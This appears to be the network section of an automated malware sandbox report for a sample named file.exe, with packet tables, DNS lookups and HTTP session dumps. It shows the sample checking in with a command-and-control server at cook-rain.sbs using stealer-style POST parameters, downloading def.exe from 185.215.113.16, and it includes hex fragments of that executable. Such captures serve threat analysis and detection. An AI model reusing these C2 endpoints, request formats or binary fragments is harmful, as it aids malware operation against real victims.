                                                                                                                                                                                            Nov 20, 2024 21:06:06.027132988 CET4434995613.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:06:06.198863029 CET4434995213.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:06:06.198945045 CET4434995213.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:06:06.199062109 CET4434995213.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:06:06.199183941 CET49952443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:06:06.199291945 CET49952443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:06:06.199316978 CET4434995213.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:06:06.199343920 CET49952443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:06:06.199352980 CET4434995213.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:06:06.202279091 CET4434995313.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:06:06.202523947 CET49957443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:06:06.202569008 CET4434995713.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:06:06.202970028 CET49957443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:06:06.203098059 CET49957443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:06:06.203114033 CET4434995713.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:06:06.203202963 CET49953443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:06:06.203217983 CET4434995313.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:06:06.203579903 CET49953443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:06:06.203586102 CET4434995313.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:06:06.255803108 CET4434995413.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:06:06.256408930 CET49954443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:06:06.256445885 CET4434995413.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:06:06.256849051 CET49954443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:06:06.256855965 CET4434995413.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:06:06.652930021 CET4434995313.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:06:06.653098106 CET4434995313.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:06:06.653471947 CET49953443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:06:06.653652906 CET49953443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:06:06.653652906 CET49953443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:06:06.653676033 CET4434995313.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:06:06.653687954 CET4434995313.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:06:06.656963110 CET49958443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:06:06.656999111 CET4434995813.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:06:06.657082081 CET49958443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:06:06.657227039 CET49958443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:06:06.657246113 CET4434995813.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:06:06.702014923 CET4434995413.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:06:06.703227997 CET4434995413.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:06:06.703331947 CET49954443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:06:06.703371048 CET49954443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:06:06.703389883 CET4434995413.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:06:06.703401089 CET49954443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:06:06.703407049 CET4434995413.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:06:06.707035065 CET49959443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:06:06.707081079 CET4434995913.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:06:06.707215071 CET49959443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:06:06.707412958 CET49959443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:06:06.707425117 CET4434995913.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:06:07.710536003 CET4434995513.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:06:07.711113930 CET49955443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:06:07.711134911 CET4434995513.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:06:07.711663008 CET49955443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:06:07.711680889 CET4434995513.107.246.63192.168.2.4
                                                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                            Nov 20, 2024 21:04:02.338148117 CET6483053192.168.2.41.1.1.1
                                                                                                                                                                                            Nov 20, 2024 21:04:02.671582937 CET53648301.1.1.1192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:19.166755915 CET138138192.168.2.4192.168.2.255
                                                                                                                                                                                            Nov 20, 2024 21:04:38.781236887 CET53508571.1.1.1192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:39.037344933 CET53628091.1.1.1192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:41.854266882 CET53652221.1.1.1192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:42.925952911 CET6295653192.168.2.41.1.1.1
                                                                                                                                                                                            Nov 20, 2024 21:04:42.926264048 CET6068553192.168.2.41.1.1.1
                                                                                                                                                                                            Nov 20, 2024 21:04:43.064965963 CET53629561.1.1.1192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:43.065051079 CET53606851.1.1.1192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:46.068876982 CET5854653192.168.2.41.1.1.1
                                                                                                                                                                                            Nov 20, 2024 21:04:46.069495916 CET5871753192.168.2.41.1.1.1
                                                                                                                                                                                            Nov 20, 2024 21:04:54.199148893 CET53523321.1.1.1192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:56.689887047 CET6114353192.168.2.41.1.1.1
                                                                                                                                                                                            Nov 20, 2024 21:04:56.689944029 CET4973753192.168.2.41.1.1.1
                                                                                                                                                                                            Nov 20, 2024 21:04:59.066893101 CET53618601.1.1.1192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:18.050296068 CET53617581.1.1.1192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:38.363673925 CET53497901.1.1.1192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:40.775541067 CET53643061.1.1.1192.168.2.4
                                                                                                                                                                                            TimestampSource IPDest IPChecksumCodeType
                                                                                                                                                                                            Nov 20, 2024 21:04:38.969660044 CET192.168.2.41.1.1.1c272(Port unreachable)Destination Unreachable
                                                                                                                                                                                            Nov 20, 2024 21:04:46.502310038 CET192.168.2.41.1.1.1c2c1(Port unreachable)Destination Unreachable
                                                                                                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                            Nov 20, 2024 21:04:02.338148117 CET192.168.2.41.1.1.10x5ef3Standard query (0)cook-rain.sbsA (IP address)IN (0x0001)false
                                                                                                                                                                                            Nov 20, 2024 21:04:42.925952911 CET192.168.2.41.1.1.10x9e15Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                            Nov 20, 2024 21:04:42.926264048 CET192.168.2.41.1.1.10x726Standard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                            Nov 20, 2024 21:04:46.068876982 CET192.168.2.41.1.1.10xb94Standard query (0)js.monitor.azure.comA (IP address)IN (0x0001)false
                                                                                                                                                                                            Nov 20, 2024 21:04:46.069495916 CET192.168.2.41.1.1.10x3162Standard query (0)js.monitor.azure.com65IN (0x0001)false
                                                                                                                                                                                            Nov 20, 2024 21:04:56.689887047 CET192.168.2.41.1.1.10x52f0Standard query (0)mdec.nelreports.netA (IP address)IN (0x0001)false
                                                                                                                                                                                            Nov 20, 2024 21:04:56.689944029 CET192.168.2.41.1.1.10xccdcStandard query (0)mdec.nelreports.net65IN (0x0001)false
                                                                                                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                            Nov 20, 2024 21:04:02.671582937 CET1.1.1.1192.168.2.40x5ef3No error (0)cook-rain.sbs104.21.66.38A (IP address)IN (0x0001)false
                                                                                                                                                                                            Nov 20, 2024 21:04:02.671582937 CET1.1.1.1192.168.2.40x5ef3No error (0)cook-rain.sbs172.67.155.248A (IP address)IN (0x0001)false
                                                                                                                                                                                            Nov 20, 2024 21:04:43.064965963 CET1.1.1.1192.168.2.40x9e15No error (0)www.google.com216.58.208.228A (IP address)IN (0x0001)false
                                                                                                                                                                                            Nov 20, 2024 21:04:43.065051079 CET1.1.1.1192.168.2.40x726No error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                            Nov 20, 2024 21:04:46.207782030 CET1.1.1.1192.168.2.40x2e98No error (0)consentdeliveryfd.azurefd.netfirstparty-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                            Nov 20, 2024 21:04:46.208969116 CET1.1.1.1192.168.2.40xb94No error (0)js.monitor.azure.comaijscdn2-bwfdfxezdubebtb0.z01.azurefd.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                            Nov 20, 2024 21:04:46.208969116 CET1.1.1.1192.168.2.40xb94No error (0)aijscdn2-bwfdfxezdubebtb0.z01.azurefd.netstar-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                            Nov 20, 2024 21:04:46.208969116 CET1.1.1.1192.168.2.40xb94No error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                            Nov 20, 2024 21:04:46.208969116 CET1.1.1.1192.168.2.40xb94No error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                                                                                                                                                            Nov 20, 2024 21:04:46.209112883 CET1.1.1.1192.168.2.40x4934No error (0)consentdeliveryfd.azurefd.netfirstparty-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                            Nov 20, 2024 21:04:46.209112883 CET1.1.1.1192.168.2.40x4934No error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                            Nov 20, 2024 21:04:46.209112883 CET1.1.1.1192.168.2.40x4934No error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                                                                                                                                                            Nov 20, 2024 21:04:46.502178907 CET1.1.1.1192.168.2.40x3162No error (0)js.monitor.azure.comaijscdn2-bwfdfxezdubebtb0.z01.azurefd.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                            Nov 20, 2024 21:04:46.502178907 CET1.1.1.1192.168.2.40x3162No error (0)aijscdn2-bwfdfxezdubebtb0.z01.azurefd.netstar-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                            Nov 20, 2024 21:04:48.922655106 CET1.1.1.1192.168.2.40x4339No error (0)consentdeliveryfd.azurefd.netfirstparty-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                            Nov 20, 2024 21:04:48.922655106 CET1.1.1.1192.168.2.40x4339No error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                            Nov 20, 2024 21:04:48.922655106 CET1.1.1.1192.168.2.40x4339No error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                                                                                                                                                            Nov 20, 2024 21:04:48.923006058 CET1.1.1.1192.168.2.40xd8b3No error (0)consentdeliveryfd.azurefd.netfirstparty-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                            Nov 20, 2024 21:04:56.915992022 CET1.1.1.1192.168.2.40x52f0No error (0)mdec.nelreports.netmdec.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                            Nov 20, 2024 21:04:56.925678015 CET1.1.1.1192.168.2.40xccdcNo error (0)mdec.nelreports.netmdec.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                            • cook-rain.sbs
                                                                                                                                                                                            • slscr.update.microsoft.com
                                                                                                                                                                                            • fs.microsoft.com
                                                                                                                                                                                            • https:
                                                                                                                                                                                              • wcpstatic.microsoft.com
                                                                                                                                                                                              • js.monitor.azure.com
                                                                                                                                                                                            • otelrules.azureedge.net
                                                                                                                                                                                            • 185.215.113.16
                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            0192.168.2.449744185.215.113.16806860C:\Users\user\Desktop\file.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            Nov 20, 2024 21:04:26.264413118 CET200OUTGET /off/def.exe HTTP/1.1
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                            Host: 185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:27.674637079 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                            Date: Wed, 20 Nov 2024 20:04:27 GMT
                                                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                                                            Content-Length: 2768384
                                                                                                                                                                                            Last-Modified: Wed, 20 Nov 2024 19:41:03 GMT
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            ETag: "673e3b4f-2a3e00"
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 a0 2a 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 e0 2a 00 00 04 00 00 6b 14 2b 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                            Data Ascii: MZ@z!L!This program cannot be run in DOS mode.$PELP(,e"0$* `@ *k+`Ui` @ @.rsrc`2@.idata 8@fysdnnem)):@nvcnsgcm **@.taggant@*"*@
                                                                                                                                                                                            Nov 20, 2024 21:04:27.674664974 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                            Nov 20, 2024 21:04:27.674678087 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                            Nov 20, 2024 21:04:27.674690008 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                            Nov 20, 2024 21:04:27.674705029 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                            Nov 20, 2024 21:04:27.674716949 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                            Nov 20, 2024 21:04:27.674731970 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                            Nov 20, 2024 21:04:27.674742937 CET1236INData Raw: bd 05 96 7d 95 62 97 42 1e 51 95 ba 0e 87 f2 6c ba 9e fc 5c 7b 3c e9 1c 4a 17 cb 3b e4 9c 5b 52 76 89 41 e1 df 7a 1c 9d c6 d2 d2 72 ef 40 87 3d 2b 18 b7 6c 67 0b 8a 38 1d 3a 94 36 2d 10 4e 4f 2f 03 a7 7c 95 0e a3 94 79 27 b6 32 0b 21 94 cd 57 ea
                                                                                                                                                                                            Data Ascii: }bBQl\{<J;[RvAzr@=+lg8:6-NO/|y'2!Wa<h:PX>!K26@ZM'$ga%n9G!&dLEk<up7%2O0{CH)<CJ~!K]*I0#I+{#{3PQ`
                                                                                                                                                                                            Nov 20, 2024 21:04:27.674765110 CET1236INData Raw: a9 06 ad 92 d1 06 b1 5e ba f1 35 73 14 29 ab eb 5b 31 a7 76 8d 3c c9 5b 4b 8e d1 82 31 49 a1 7d 5b 31 e1 5c bd 69 e5 7f c2 fc 22 fb 31 06 ed 7c 5b 65 ad aa 8d 4d fd 70 7f a2 07 b7 59 29 09 54 8b 2a 41 d7 14 85 9a 04 32 89 b9 7d 9b 1a 21 cb a3 c1
                                                                                                                                                                                            Data Ascii: ^5s)[1v<[K1I}[1\i"1|[eMpY)T*A2}!),1!T9s, $`\1e]iii2.6{q<ylCM~<5!(;L1U)!inemk4}1TT0Ajerz(ITV1SA<18=;] <=
                                                                                                                                                                                            Nov 20, 2024 21:04:27.674786091 CET1236INData Raw: 72 23 a6 83 87 41 ad 4f 6e 6e 5d 7d 26 ed 9c f1 20 fc ae aa 61 16 d1 23 16 5f dc 9b 80 e1 02 21 78 2e db ad 1f 82 cf 41 ac 60 82 50 3b 1b e2 13 6c 09 01 8d 11 6c 1e 9f 2b f9 0a 9f 7c 5c fd d7 a3 16 f9 6b 2d 60 f1 85 22 d3 41 7e 99 b6 c6 ce de ef
                                                                                                                                                                                            Data Ascii: r#AOnn]}& a#_!x.A`P;ll+|\k-`"A~G%Liy[=0?Z[HmH6F#4`0|5+}s3U{&Er0_I39Ntn)hWYB3}>x\`?`n,lMZ|!Of*L-5VG
                                                                                                                                                                                            Nov 20, 2024 21:04:27.794795990 CET1236INData Raw: 1a 4e 76 27 44 1d 8c 56 3f a1 92 41 f8 fd ce 5d 0f 16 9b bd 0f 1d ed 4a 0c 33 79 a3 12 0e 78 6e 0f 0d f3 88 5c 1a 3f 10 8f e2 88 b4 70 cc aa eb 5a c7 05 82 72 6b b5 3a 5b fb 9e 91 79 5a f9 88 09 68 f7 7f 7f 5c ee 2b dc 26 98 0d cc 70 fc bf 7b e1
                                                                                                                                                                                            Data Ascii: Nv'DV?A]J3yxn\?pZrk:[yZh\+&p{ MuZWbl7')pJv$|g:;LteXJGl0m>/k5)l!BTzJ2MPUf1M-!-{sP}n,8[]Bo; dF%/(iW


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            0192.168.2.449730104.21.66.384436860C:\Users\user\Desktop\file.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-20 20:04:04 UTC260OUTPOST /api HTTP/1.1
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                            Content-Length: 8
                                                                                                                                                                                            Host: cook-rain.sbs
                                                                                                                                                                                            2024-11-20 20:04:04 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                            Data Ascii: act=life
                                                                                                                                                                                            2024-11-20 20:04:04 UTC980INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 20 Nov 2024 20:04:04 GMT
                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Set-Cookie: PHPSESSID=b3vmv7v6ml7n1qd10juiovp1l9; expires=Sun, 16-Mar-2025 13:50:43 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IFbN1LbIOOFBswYA5blFMMlaksIOrN93qsp31K0dBGgtCVKpsHrOsfkPaDTJHkFwNv9VFHW3oktN5hJO2pK7bS%2FGml3TKu2asa4s%2FX2h9KYZcaP%2BdTvOX4PrVsyRuTsU"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                            CF-RAY: 8e5b0c06ab8b42a7-EWR
                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1725&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2829&recv_bytes=904&delivery_rate=1619523&cwnd=199&unsent_bytes=0&cid=641870a826b8f0e7&ts=731&x=0"
                                                                                                                                                                                            2024-11-20 20:04:04 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                                                            Data Ascii: 2ok
                                                                                                                                                                                            2024-11-20 20:04:04 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            1192.168.2.449731104.21.66.384436860C:\Users\user\Desktop\file.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-20 20:04:05 UTC261OUTPOST /api HTTP/1.1
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                            Content-Length: 53
                                                                                                                                                                                            Host: cook-rain.sbs
                                                                                                                                                                                            2024-11-20 20:04:05 UTC53OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 26 6a 3d
                                                                                                                                                                                            Data Ascii: act=recive_message&ver=4.0&lid=LOGS11--LiveTraffic&j=
                                                                                                                                                                                            2024-11-20 20:04:06 UTC980INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 20 Nov 2024 20:04:06 GMT
                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Set-Cookie: PHPSESSID=ll3niarajkuo219ngbo1ueh74k; expires=Sun, 16-Mar-2025 13:50:45 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iq0C504mnH%2BFNBgooYIfTBlR48ofNrDsoVvtbIAPhcx68pnpFFE9Lw7uUaK5343FX8VLsCypZRy3WLdvfHEJU6UqPeRl%2BRSGdNMISJx8DjkHR%2F40baqrr2aa41V3LMEC"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                            CF-RAY: 8e5b0c133e498cad-EWR
                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=2129&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2828&recv_bytes=950&delivery_rate=1449131&cwnd=245&unsent_bytes=0&cid=883c73a582fcf128&ts=722&x=0"
                                                                                                                                                                                            2024-11-20 20:04:06 UTC389INData Raw: 34 34 36 63 0d 0a 79 45 46 65 53 6d 39 68 52 32 64 75 70 2b 78 32 43 4a 52 31 5a 2f 57 59 2b 53 42 31 53 6d 53 75 46 74 4d 4f 76 68 6a 70 6b 71 75 7a 59 79 68 6f 56 56 56 72 52 52 33 43 7a 6b 78 38 35 67 41 43 32 62 71 59 52 46 64 77 41 73 39 36 6f 47 75 53 4f 70 2f 2f 69 66 49 6e 50 79 59 63 42 47 74 46 43 39 2f 4f 54 46 50 76 56 77 4b 62 75 73 4d 43 45 43 41 47 7a 33 71 78 62 39 56 33 6d 66 37 49 6f 43 30 35 49 67 6f 43 49 77 59 43 79 6f 6b 54 62 66 55 66 43 5a 7a 31 6b 55 31 58 5a 6b 62 4c 62 50 45 30 6e 46 57 4d 35 73 71 46 49 43 30 68 54 52 78 72 48 45 7a 43 67 6c 51 79 74 68 51 43 6c 2f 53 66 52 42 34 69 44 4d 5a 79 73 47 72 55 61 49 44 30 77 36 41 6a 4f 69 4d 41 43 7a 63 4c 43 4d 32 43 46 57 66 31 56 30 76 58 2f 59 4d 43 54 32 68 56 2f 6e 65 67 66
                                                                                                                                                                                            Data Ascii: 446cyEFeSm9hR2dup+x2CJR1Z/WY+SB1SmSuFtMOvhjpkquzYyhoVVVrRR3Czkx85gAC2bqYRFdwAs96oGuSOp//ifInPyYcBGtFC9/OTFPvVwKbusMCECAGz3qxb9V3mf7IoC05IgoCIwYCyokTbfUfCZz1kU1XZkbLbPE0nFWM5sqFIC0hTRxrHEzCglQythQCl/SfRB4iDMZysGrUaID0w6AjOiMACzcLCM2CFWf1V0vX/YMCT2hV/negf
